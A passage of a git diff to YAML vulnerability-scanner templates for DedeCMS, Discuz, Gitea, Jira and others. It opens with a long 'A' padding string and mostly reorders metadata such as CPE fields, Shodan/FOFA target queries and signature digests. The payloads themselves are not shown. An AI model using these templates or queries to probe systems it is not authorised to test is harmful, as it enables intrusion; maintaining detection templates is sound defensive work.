AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA unsafe: true + matchers-condition: and matchers: - type: word @@ -39,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220728bf84816998d58d541ed1a352c6a5376a1f83545a85e6eabcc8d69ebb24e17022100f1652ecf3c29d0bbd5302823d1304ba5285767319ebcfb0822e993357a987332:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220728bf84816998d58d541ed1a352c6a5376a1f83545a85e6eabcc8d69ebb24e17022100f1652ecf3c29d0bbd5302823d1304ba5285767319ebcfb0822e993357a987332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml b/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml index 5b78d74350..b210ce515f 100644 --- a/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml +++ b/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml @@ -7,16 +7,16 @@ info: description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter. reference: - https://www.cnblogs.com/milantgh/p/3615986.html + classification: + cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"power by dedecms" || title:"dedecms" - product: dedecms vendor: dedecms + product: dedecms + shodan-query: http.html:"power by dedecms" || title:"dedecms" tags: dedecms - classification: - cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,4 @@ http: status: - 200 -# digest: 4a0a004730450220705c0901bb2debdb5f0d26f01cbf9af70a8ef4a2e60cec83f54a336933ed1756022100d6a8d6191c1622538f5363f09e96753c9f24a494ede7f641998d4ea7d3556688:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220705c0901bb2debdb5f0d26f01cbf9af70a8ef4a2e60cec83f54a336933ed1756022100d6a8d6191c1622538f5363f09e96753c9f24a494ede7f641998d4ea7d3556688:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/dedecms/dedecms-rce.yaml b/http/vulnerabilities/dedecms/dedecms-rce.yaml index 21f1fb2892..7c3e66d336 100644 --- a/http/vulnerabilities/dedecms/dedecms-rce.yaml +++ b/http/vulnerabilities/dedecms/dedecms-rce.yaml @@ -9,6 +9,8 @@ info: reference: - https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html - https://sectime.top/post/1d114771.html + classification: + cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 @@ -17,8 +19,6 @@ info: vendor: dedecms tags: dedecms,cms,rce - classification: - cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml b/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml index cae70c3ba7..45d7ac7982 100644 --- a/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml +++ b/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml @@ -8,17 +8,17 @@ info: reference: - https://crx.xmspace.net/discuz_x25_api_php.html - http://www.1314study.com/t/87417.html + classification: + cpe: cpe:2.3:a:comsenz:discuz\\!:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: comsenz + product: discuz\\! shodan-query: title:"Discuz!" fofa-query: title="Discuz!" - product: discuz\\! - vendor: comsenz tags: discuz,info,disclosure - classification: - cpe: cpe:2.3:a:comsenz:discuz\\!:*:*:*:*:*:*:*:* http: - method: GET path: @@ -42,4 +42,4 @@ http: status: - 200 -# digest: 4a0a0047304502202a08c3fa9304cacdc32c84c55e79263202268de3fd524bd2edc44d0a687648af022100b8d1d52d3b88bcf50cd5f659d3e59024543fa9e29086e2f1383aa904b46e2d68:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202a08c3fa9304cacdc32c84c55e79263202268de3fd524bd2edc44d0a687648af022100b8d1d52d3b88bcf50cd5f659d3e59024543fa9e29086e2f1383aa904b46e2d68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml b/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml index 434a77531a..9c607c99df 100644 --- a/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml +++ b/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml @@ -7,6 +7,8 @@ info: description: Directiory listing enabled in Node ecstatic. reference: - https://tripla.dk/2020/03/26/multiple-vulnerabilities-in-nodejs-ecstatic-http-server-http-party/ + classification: + cpe: cpe:2.3:a:ecstatic_project:ecstatic:*:*:*:*:node.js:*:*:* metadata: verified: true max-request: 1 @@ -15,8 +17,7 @@ info: vendor: ecstatic_project tags: node,js,listing,ecstatic - classification: - cpe: cpe:2.3:a:ecstatic_project:ecstatic:*:*:*:*:node.js:*:*:* + http: - method: GET path: diff --git a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml index d8a5fabd98..7cf8f30222 100644 --- a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml +++ b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml @@ -6,16 +6,16 @@ info: severity: high description: | The `state` parameter of the `NetSecConfigAjax` interface of the Yisaitong electronic document security management system does not pre-compile and adequately verify the incoming data, resulting in a SQL injection vulnerability in the interface. Malicious attackers may obtain the server through this vulnerability information or directly obtain server permissions. - metadata: - verified: true - vendor: esafenet - max-request: 1 - fofa-query: title="电子文档安全管理系统",body="CDGServer3/" - product: cdg - tags: esafenet,sqli - classification: cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: esafenet + product: cdg + fofa-query: title="电子文档安全管理系统",body="CDGServer3/" + tags: esafenet,sqli + http: - raw: - | @@ -32,4 +32,5 @@ http: - 'contains(body,"操作成功")' - 'status_code == 200' condition: and -# digest: 490a0046304402200d661ef351e46745e95858f066515919d01ac3c33df6ebdf8713b90322df8e2802201bfd4eac3b4e3fb51a1e8797fea37efee4756737acf9ef39b8781bb7625bf968:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402200d661ef351e46745e95858f066515919d01ac3c33df6ebdf8713b90322df8e2802201bfd4eac3b4e3fb51a1e8797fea37efee4756737acf9ef39b8781bb7625bf968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/gitea/gitea-rce.yaml b/http/vulnerabilities/gitea/gitea-rce.yaml index 5e5e022a3c..f1cf202a91 100644 --- a/http/vulnerabilities/gitea/gitea-rce.yaml +++ b/http/vulnerabilities/gitea/gitea-rce.yaml @@ -9,16 +9,16 @@ info: reference: - https://www.exploit-db.com/exploits/44996 - https://github.com/kacperszurek/exploits/blob/master/Gitea/gitea_lfs_rce.py + classification: + cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 - shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"' - product: gitea vendor: gitea + product: gitea + shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"' tags: gitea,rce,unauth,edb - classification: - cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* http: - raw: - | @@ -62,4 +62,4 @@ http: - '"name":".*","full_name":"(.*)","description"' internal: true -# digest: 490a0046304402206bedfc95c5c775b9dab649e784921360bfcc0c684722fd67533e2def7e40cc7c0220665341d1ed01c8bdfa56d062fc988325a387a1fccda93d31db3dd809072ef49c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206bedfc95c5c775b9dab649e784921360bfcc0c684722fd67533e2def7e40cc7c0220665341d1ed01c8bdfa56d062fc988325a387a1fccda93d31db3dd809072ef49c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml b/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml index 6bc535f2dc..ba49c829e1 100644 --- a/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml +++ b/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml @@ -4,15 +4,15 @@ info: name: Jira Unauthenticated Admin Projects author: TESS severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" - product: jira - vendor: atlassian - tags: atlassian,jira - classification: cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: atlassian + product: jira + shodan-query: http.component:"Atlassian Jira" + tags: atlassian,jira + http: - method: GET path: @@ -37,4 +37,4 @@ http: words: - "atlassian.xsrf.token" -# digest: 4a0a00473045022100d192828f15073c7df4a3d1b3369af25c0d6977b40c0a61f3976de004d38b678f0220487e369453a208bc460da114e6c9b11e804921b69a203bdddf80857f2478128f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d192828f15073c7df4a3d1b3369af25c0d6977b40c0a61f3976de004d38b678f0220487e369453a208bc460da114e6c9b11e804921b69a203bdddf80857f2478128f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml b/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml index e569b2817d..dc398b9b77 100644 --- a/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml +++ b/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml @@ -6,15 +6,15 @@ info: name: Jira Unauthenticated Dashboards author: TechbrunchFR severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" - product: jira - vendor: atlassian - tags: atlassian,jira - classification: cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: atlassian + product: jira + shodan-query: http.component:"Atlassian Jira" + tags: atlassian,jira + http: - method: GET path: @@ -35,4 +35,4 @@ http: # If you change this setting, you will still need to update the existing filters and dashboards if they have already been # shared publicly. # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. -# digest: 4a0a0047304502210082b7cb53987cdc653c9a8954733b3456da26355e585b238aa94d81e7938d77f302204de8001df94c11cc650f5ae455212a63c404a066cc29b911fd45686c3bde1a9e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210082b7cb53987cdc653c9a8954733b3456da26355e585b238aa94d81e7938d77f302204de8001df94c11cc650f5ae455212a63c404a066cc29b911fd45686c3bde1a9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml b/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml index 7c8c092ec8..2bb208d08f 100644 --- a/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml +++ b/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml @@ -6,15 +6,15 @@ info: severity: info reference: - https://developer.atlassian.com/cloud/jira/platform/rest/v2/api-group-screens/#api-rest-api-2-screens-get - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" - product: jira_data_center - vendor: atlassian - tags: atlassian,jira - classification: cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: atlassian + product: jira_data_center + shodan-query: http.component:"Atlassian Jira" + tags: atlassian,jira + http: - method: GET path: @@ -40,4 +40,4 @@ http: words: - "atlassian.xsrf.token" -# digest: 4b0a00483046022100f47ced43b8419319e9c9ec86664c53d54c3445bffd4b95b2253a39b81856bc20022100e9d254c328d1a1daf297468d1fc6ae202f3e5aa15505af50625e290a019cdfef:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f47ced43b8419319e9c9ec86664c53d54c3445bffd4b95b2253a39b81856bc20022100e9d254c328d1a1daf297468d1fc6ae202f3e5aa15505af50625e290a019cdfef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml b/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml index 2fc6131f5d..9dcdb06e0a 100644 --- a/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml +++ b/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml @@ -4,15 +4,15 @@ info: name: Jira Unauthenticated User Picker author: TechbrunchFR severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" - product: jira_data_center - vendor: atlassian - tags: atlassian,jira - classification: cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: atlassian + product: jira_data_center + shodan-query: http.component:"Atlassian Jira" + tags: atlassian,jira + http: - method: GET path: @@ -23,4 +23,4 @@ http: words: - 'user-picker' -# digest: 